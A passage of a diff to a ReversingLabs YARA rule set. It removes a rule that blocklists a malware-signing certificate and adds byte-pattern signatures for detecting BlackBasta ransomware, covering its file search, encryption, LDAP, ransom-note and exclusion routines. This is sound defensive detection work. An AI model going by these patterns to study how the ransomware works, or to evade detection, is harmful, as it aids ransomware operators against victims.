rule that detects BlackBasta ransomware." author = "ReversingLabs" - id = "dc826355-bd15-58b3-adcb-55b704f03c0d" - date = "2023-11-08" - modified = "2023-11-08" + id = "7c451fde-b8b1-5a35-855e-7e30f3e75cbb" + date = "2022-12-13" + modified = "2022-12-13" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4460-L4478" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "037e154854c1128fb73d2221c2b7d7211d977492378614fcf4fde959207e34b3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.BlackBasta.yara#L1-L531" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c68671e51489af00e9e0cf28373e5ec01bda042653dbcca8843357eede41f27f" score = 75 - quality = 90 - tags = "INFO, FILE" + quality = 88 + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BlackBasta" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Accelerate Technologies Ltd" and (pe.signatures[i].serial=="00:b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77" or pe.signatures[i].serial=="b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77") and 1594900020<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_566Ac16A57B132D3F64Dced14De790Ee : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "cb2ebbd5-5036-52f6-a064-11609f02309f" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4480-L4496" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "48f4d334614f6c413907d51f4d6312554b13c4f5a3c03070ceba48baa13a8247" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files = { + 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? + ?? 83 C4 ?? 8B F0 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6 + E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 ?? ?? ?? ?? 89 9D ?? + ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 + 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 + ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? + ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? + 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 + } + $encrypt_files_v1 = { + 6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? + ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F + ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A + ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 FF B5 ?? ?? ?? ?? 57 53 56 83 EC ?? 8B F4 89 A5 + ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ?? + ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A + ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? + ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 + ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ?? ?? ?? + 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + } + $cmd_prompt = { + 8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? FC 53 56 8B 75 ?? 8D 45 ?? 33 DB + 68 ?? ?? ?? ?? 53 50 89 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 0F 84 ?? + ?? ?? ?? 85 F6 75 ?? 53 39 5D ?? 75 ?? E8 ?? ?? ?? ?? 59 33 C0 E9 ?? ?? ?? ?? FF 75 + ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 85 F6 0F 94 C0 E9 ?? + ?? ?? ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 5D ?? 57 85 C0 74 ?? E8 + ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 53 89 18 8D 45 ?? 50 FF 75 ?? 53 E8 ?? ?? ?? ?? 83 + C4 ?? 8B F0 E8 ?? ?? ?? ?? 83 FE ?? 74 ?? 89 38 EB ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ?? + 83 38 ?? 74 ?? 83 CE ?? FF 75 ?? E8 ?? ?? ?? ?? 59 EB ?? E8 ?? ?? ?? ?? 89 38 53 8D + 45 ?? B9 ?? ?? ?? ?? 50 51 53 89 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ?? + 83 C4 ?? 8B C6 5F 8B 4D ?? 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 53 + } + $ldap_connect = { + C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? + 50 6A ?? 53 8B 35 ?? ?? ?? ?? FF D6 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 53 FF D6 + 6A ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ?? + 85 C0 74 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? + 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ?? + 8B F0 89 75 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 56 53 FF 15 ?? ?? ?? ?? 83 C4 ?? + 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? + ?? ?? ?? FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B + 06 85 C0 0F 84 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8B 4D + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 36 68 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 8B C8 89 4D ?? 8B 01 8B 40 ?? C6 45 ?? ?? 8B 44 08 ?? 8B 58 ?? 89 5D + ?? 8B 03 8B CB FF 50 ?? 83 4D ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 10 6A ?? + 8B C8 FF 52 ?? 0F B7 C0 89 45 ?? 83 65 ?? ?? C6 45 ?? ?? 85 DB 74 ?? 8B 03 8B CB FF + 50 ?? 8B C8 85 C9 74 ?? 8B 01 6A ?? FF 10 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D + ?? E8 ?? ?? ?? ?? 8B 5D ?? 56 FF 15 + } + $encrypt_files_v2 = { + 8D 45 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 FF 75 ?? 83 EC ?? 8B + F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 + ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 + ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + } + $encrypt_files_v3 = { + 6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? + ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F + ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A + ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 56 83 EC ?? 8B F4 89 A5 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ?? ?? ?? ?? C6 + 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B5 ?? + ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 + ?? ?? 8D 8D ?? ?? ?? ?? E8 + } + $encrypt_files_v4 = { + 8D 45 ?? 50 E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 11 45 ?? 0F 10 45 ?? 0F 11 45 ?? 8B 45 ?? + 8B 4D ?? 89 45 ?? 89 4D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? + 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 56 57 8D 45 ?? 50 8D 45 ?? 50 83 EC ?? 8B + F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 + ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 8D 85 + ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8D 0C 4D ?? ?? ?? ?? 89 8D ?? ?? + ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B + 50 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? FF FF C6 + 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 + } + $drop_ransom_note_v1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 03 00 00 A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 + 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 + BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A + ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 + BD ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? + 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? + 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 + 5D C3 + } + $exclude_from_encryption_v1 = { + 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D + ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 + ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B + F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D + 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? + 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? 83 FE ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D + } + $exclude_from_encryption_v2_p1 = { + 50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? + ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 + 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? + E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 + } + $exclude_from_encryption_v2_p2 = { + 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 84 C0 0F 44 CA 8D 45 ?? 50 E8 ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ?? + ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 + } + $encrypt_files_v5_p1 = { + 50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D 45 ?? 50 56 FF 15 ?? ?? + ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? + 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C7 45 ?? ?? ?? ?? ?? 8D 4B ?? E8 ?? + ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B C2 ?? ?? 8B 7D ?? 83 + C1 ?? 8B 35 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B 7D ?? + 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? + E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ?? + FF 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? FF 75 ?? 83 + } + $encrypt_files_v5_p2 = { + C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C ?? 81 FF ?? ?? + ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0 66 0F 13 45 + ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CF 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2 50 51 E8 ?? + ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89 45 ?? F2 0F + 11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85 ?? ?? ?? ?? + 39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? + 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 85 + C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F 11 45 ?? 50 + E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D + ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 50 FF 75 ?? + FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ?? ?? ?? 89 45 + ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 FF 75 ?? 57 + 6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 57 + C0 66 0F 13 45 ?? 0F 8C ?? ?? ?? ?? 7F 